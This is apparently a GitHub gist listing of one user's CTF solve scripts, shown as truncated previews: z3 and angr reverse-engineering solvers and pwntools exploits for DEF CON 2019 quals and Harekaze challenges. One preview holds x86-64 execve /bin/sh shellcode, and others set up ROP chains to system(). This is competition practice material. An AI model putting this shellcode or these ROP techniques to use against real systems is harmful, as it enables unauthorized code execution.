
yyy ywkw1717

@ywkw1717
ywkw1717 / special_device_file
Created October 28, 2018 08:46
SECCON 2018 Online CTF Special Device File
#!/usr/bin/env python
def main():
key = [
"fbde15b0",
"ae2cc59b",
"27529ad0",
"432a8be5",
"271687b2",
@ywkw1717
ywkw1717 / special_instructions
Created October 28, 2018 09:01
SECCON 2018 Online CTF Special Instructions
#!/usr/bin/env python
def main():
key = ["35c36d03",
"c8fa2132",
"9f72275c",
"3ed1ca90",
"e32b4951",
"1c29ac51",
@ywkw1717
ywkw1717 / key_maker.py
Created April 22, 2019 12:13
ASIS CTF Quals 2019 Key maker
#!/usr/bin/env python
from z3 import *
def main():
cmp_to_local_148 = [0x758, 0x2c0, 0x808, 0x306, 0x251, 0x116, 0x2c9, 0x144, 0x5f7, 0x2d5, 0x3d7, 0x298, 0x88a, 0x2bf, 0xa86, 0x347]
cmp_to_local_188 = [0x14f, 0x6e8, 0x6db, 0x69b, 0x3ae, 0x403, 0x3ff, 0x6fd, 0x2f6, 0x515, 0x4fa, 0x6fa, 0x30c, 0x310, 0x26c, 0x540]
cmp_to_local_1c8 = [0x4ab, 0x3d4, 0x47c, 0x56f, 0x58a, 0x4ec, 0x32b, 0x3f1, 0x556, 0x486, 0x3cb, 0x481, 0x42c, 0x2e0, 0x3a4, 0x348]
cmp_to_local_208 = [0x798, 0x3ef, 0x5a0, 0x3d2, 0x4ad, 0x127, 0x585, 0x15e, 0x622, 0x385, 0x53a, 0x382, 0x3ae, 0x2d0, 0x24a, 0x2b1]
cmp_to_local_248 = [0x3ca, 0x5a7, 0x567, 0x8b1, 0x089, 0x48b, 0x538, 0x488, 0x15c, 0x505, 0x533, 0x4fd, 0x120, 0x2ca, 0x291, 0x2df]
#!/usr/bin/env python
from pwn import *
import time
def main():
# conn = process("./speedrun-001")
conn = remote("speedrun-001.quals2019.oooverflow.io", 31337)
# conn = remote("localhost", 3000)
bss_addr = 0x6bbae0
#!/usr/bin/env python
from pwn import *
def main():
conn = remote("speedrun-003.quals2019.oooverflow.io", 31337)
# conn = remote("localhost", 3000)
payload = "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x31\xf6\x56\x53\x54\x5f\xb0\x5a\xb0\x3b\x31\xd2\x31\xd2\x31\xd2\x31\xd2\x0f\x05"
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./speedrun-002")
# conn = remote("localhost", 3000)
conn = remote("speedrun-002.quals2019.oooverflow.io", 31337)
elf = ELF("./speedrun-002")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./babyrop")
conn = remote("problem.harekaze.com", 20001)
pop_rdi_ret = 0x400683 #: pop rdi ; ret
system = 0x400490
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./babyrop2")
conn = remote("problem.harekaze.com", 20005)
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#!/usr/bin/env python
import angr
# Load the target binary; auto_load_libs=False tells angr's loader not to pull
# in the binary's shared-library dependencies.
proj = angr.Project("./scramble", load_options={"auto_load_libs": False})
# Hard-coded start address for the analysis.
# NOTE(review): presumably the address of main(), going by the name — confirm
# against the disassembly of the exact binary build being analysed.
addr_main = 0x400680
# blank_state starts execution at addr_main instead of the program entry point,
# so any setup that would normally run before that address is not modelled.
initial_state = proj.factory.blank_state(addr=addr_main)
# NOTE(review): path_group is the older angr name for this object; later angr
# releases expose it as simulation_manager / simgr, so this script appears to be
# pinned to an old angr version — confirm before running it on a current install.
path_group = proj.factory.path_group(initial_state)
# Step the analysis until some state reaches the `find` address, discarding
# states that reach the `avoid` address.
# NOTE(review): presumably these are the success and failure branches of the
# check — the addresses are binary-specific and cannot be verified from here.
e = path_group.explore(find=(0x400737,), avoid=(0x4006fb,))
#!/usr/bin/env python
import angr
from claripy import BVS
# Load the target binary with angr's default loader options.
proj = angr.Project("./linear_operation")
# Size of the symbolic input in bytes (multiplied by 8 below to get bits).
# NOTE(review): presumably the flag length the binary expects — confirm.
length = 63
# Symbolic bitvector named "flag", 8 bits per input byte (63 * 8 = 504 bits).
flag = BVS("flag", length * 8)
# Hard-coded, binary-specific address.
# NOTE(review): presumably the branch taken when the input is accepted, going
# by the name — confirm against the disassembly.
addr_is_correct = 0x400607